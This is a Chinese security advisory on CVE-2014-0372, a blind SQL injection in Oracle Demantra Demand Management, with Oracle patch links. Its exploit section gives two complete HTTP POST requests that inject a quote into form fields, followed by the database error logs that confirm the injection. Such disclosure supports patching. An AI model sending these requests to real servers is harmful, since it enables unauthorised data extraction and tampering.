首页 -> 安全研究
安全研究
安全漏洞
Oracle Supply Chain Products Suite远程安全漏洞(CVE-2014-0372)
发布日期:2014-01-14
更新日期:2014-03-03
受影响系统:
Oracle Supply Chain Products Suite 9.3.1描述:
Oracle Supply Chain Products Suite 9.3.0.2
Oracle Supply Chain Products Suite 7.3.1
Oracle Supply Chain Products Suite 7.3.0
Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server
BUGTRAQ ID: 64826
CVE(CAN) ID: CVE-2014-0372
Oracle Demantra Demand Management是需求管理软件。
Oracle Demantra Demand Management 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.1, 12.2.2, 12.2.3版本在实现上存在安全漏洞,可使远程攻击者利用此漏洞影响机密性和完整性。
<*来源:Oracle
链接:http://secunia.com/advisories/56474
http://www.exploit-db.com/exploits/31993/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Application is vulnerable to SQL injection.
Impact:
An attacker with access to the vulnerable pages could manipulate the queries being sent to the database, potentially enabling them to:
- Extract sensitive information, including (but not limited to) authentication credentials and personal details. Such information could be sold by the attacker to other malicious individuals, used in other attacks (as the same password is often used across systems) or released publicly to damage the organisation’s reputation.
- Modify content within the application. If this was possible, the attacker could add malicious code to the application, which could then be used to deliver malware or exploit issues within client browsers.
In this particular instance, exploitation was more difficult as the results of the attack had to inferred based on the pages returned, often referred to as “blind” SQL Injection. This does not prevent exploitation, it simply means that the methods required to perform this attack require a very large number of requests to be made. However, because of this it is potentially easier to identify that an attack using this method is being attempted.
Exploit:
POST /demantra/portal/editExecDefinition.jsp HTTP/1.1
Host: www.target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://www.target.com:8080/demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=4&menuItemId=10&tkn=919872817530076
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=6741133838FDEC5D65258F72A4E4EB87
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 388
done=done&menuBarId=2&menuGroupId=4&tkn=919872817530076&menuItemId=10&menuAction=edit&order=0&command=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm'&title=Demantra+Web+Site&description=Demantra+Web+Site&type=3&fileInput=&linkInput=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm%27&desktopCommand=%23DEMANTRA.MODELER%23¶m=
Related Error Log Entry:
2013-08-01 16:42:11,039 PDT [http-8080-6] ERROR appserver.sql: ODPM-70173: Error SQL:
[error occurred during batching: ORA-01756: quoted string not properly terminated]
UPDATE EXEC_DEFINITION SET MENU_ITEM_ID = 10,EXEC_ID = 5,EXEC_PATH = '',EXEC_NAME = 'http://www.oracle.com/demantra/index.htm'',PARAMETERS = '',EXEC_TYPE = 3
WHERE EXEC_ID = 5
2013-08-01 16:42:11,039 PDT [http-8080-6] ERROR appserver.error:
com.demantra.applicationServer.appServerExceptions.FailedToExcuteBatch: java.sql.BatchUpdateException: error occurred during batching: ORA-01756: quoted string not properly terminated at com.demantra.applicationServer.services.DBServicesCommon.excuteBatch(DBServicesCommon.java:1446)
Sample Request #2:
POST /demantra/portal/saveProgramGroups.jsp HTTP/1.1
Host: www.target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://www.target.com:8080/demantra/portal/programGroupDefinition.jsp
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=AC4D868CFC8F2B0CF06B62426A9F8CF7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
selectedPGItems=SEL_TYPE_1_MODULE_5_ID_267%2CSEL_TYPE_1_MODULE_5_ID_267%2C&tkn=548771231479710&PGName=aaa'&PGDescription=aaaa&objectFilter=1&SEL_TYPE_1_MODULE_5_ID_267=on
Related Error Log Entry:
… 39 more
2013-08-01 16:57:40,287 PDT [http-8080-9] ERROR appserver.sql: ODPM-70173: Error SQL:
[error occurred during batching: ORA-00933: SQL command not properly ended]
UPDATE PROGRAM_GROUPS SET NAME = 'aaa'',DESCRIPTION = 'aaaa' WHERE PROGRAM_GROUP_ID = 9
2013-08-01 16:57:40,287 PDT [http-8080-9] ERROR appserver.error:
com.demantra.applicationServer.appServerExceptions.FailedToExcuteBatch: java.sql.BatchUpdateException: error occurred during batching: ORA-00933: SQL command not properly ended at com.demantra.applicationServer.services.DBServicesCommon.excuteBatch(DBServicesCommon.java:1446)
建议:
厂商补丁:
Oracle
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.oracle.com/technetwork/topics/security/
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixSCP
http://www.oracle.com/technetwork/topics/security/cpujan2014verbose-1972951.html#SCP
浏览次数:2906
严重程度:0(网友投票)
绿盟科技给您安全的保障